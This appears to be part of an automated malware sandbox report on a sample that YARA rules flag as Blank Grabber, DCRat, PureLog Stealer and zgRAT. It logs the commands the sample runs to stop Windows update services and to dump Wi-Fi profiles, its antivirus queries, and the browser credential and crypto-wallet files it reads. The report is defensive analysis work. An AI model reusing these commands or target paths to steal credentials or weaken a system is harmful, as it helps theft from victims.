Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_US VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_CA VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_GB VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es_419 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_CA VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe

Code function: 0_2_00DB037C GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_00DB037C

Source: C:\ProgramData\Microsoft\hacn.exe

Code function: 1_2_00007FF67D026470 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

1_2_00007FF67D026470

Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe

Code function: 0_2_00D9D076 GetVersionExW,

0_2_00D9D076

Source: C:\ProgramData\Microsoft\hacn.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Stops critical windows services

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected Blank Grabber

Source: Yara match	File source: 00000002.00000003.1686411097.000001F919A15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1686411097.000001F919A13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: based.exe PID: 6664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: based.exe PID: 6828, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI66642\rarreg.key, type: DROPPED

Yara detected DCRat

Source: Yara match	File source: 00000045.00000002.2932877358.00000000033D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000045.00000002.2932877358.0000000003144000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000045.00000002.2932877358.0000000003549000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1949562045.00000000128C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 14.3.svchost.exe.4e4e6ea.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.0.ChainComServermonitor.exe.4b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.svchost.exe.564e6ea.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.svchost.exe.4e4e6ea.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.svchost.exe.564e6ea.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000003.1722014407.0000000005600000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1702500179.00000000076F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1722722653.0000000004E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.1761622309.00000000004B2000.00000002.00000001.01000000.00000023.sdmp, type: MEMORY
Source: Yara match	File source: C:\Recovery\HpQPPZazcv.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Windows Defender\en-US\based.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\powershell.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\svchost.exe, type: DROPPED

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: based.exe PID: 6828, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 14.3.svchost.exe.4e4e6ea.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.0.ChainComServermonitor.exe.4b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.svchost.exe.564e6ea.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.svchost.exe.4e4e6ea.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.svchost.exe.564e6ea.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Recovery\HpQPPZazcv.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Windows Defender\en-US\based.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\powershell.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\svchost.exe, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: com.liberty.jaxx
Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Exodus
Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal WLAN passwords

Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Recovery\HpQPPZazcv.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications	Jump to behavior
Source: C:\Recovery\HpQPPZazcv.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage	Jump to behavior
Source: C:\Recovery\HpQPPZazcv.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f	Jump to behavior
Source: C:\Recovery\HpQPPZazcv.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History-journal
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite	Jump to behavior
